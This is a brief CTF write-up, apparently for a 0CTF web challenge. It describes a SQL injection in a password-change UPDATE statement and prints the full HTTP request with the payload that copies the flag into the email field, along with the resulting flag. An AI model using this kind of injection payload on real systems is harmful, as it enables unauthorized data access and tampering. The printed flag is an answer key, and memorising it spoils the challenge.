A simple web where we can register and login in. Once logged in, we can change our password. The home page shows a message from Tales from two cities and the email we used for log in.

There is a SQL injection affecting the UPDATE statement sent with the Modify password feature. The idea is to modify the statement to change also the email (that we can read in the home page):

POST /modify HTTP/1.1
Host: 202.112.26.104:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,es-ES;q=0.8,es;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.112.26.104:5000/modify
Cookie: session=.eJyrVopPy0kszkgtVrKKrlZSKIFQSUpWSknhYVXJRm55UYG2tkq1OlDR8HBLQ0-PlJzk3ND0JHfLvCijsGxPd0vDFEeQqliwOjINySkFGRCro5STn56emhKfmadkVVJUmqqjVFqcWpSXmJsK1FpQnpdaZGigVAsAq0Q6FQ.B_iyaw.haWh_kdtJXPqgs1n__YSVID6vlY
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

password=0ewr1pn',email=(SELECT flag from flag),password='0ewr1pn

Flag

FLAG is 0CTF{R0t_?_S8rRy_1_doNt_N}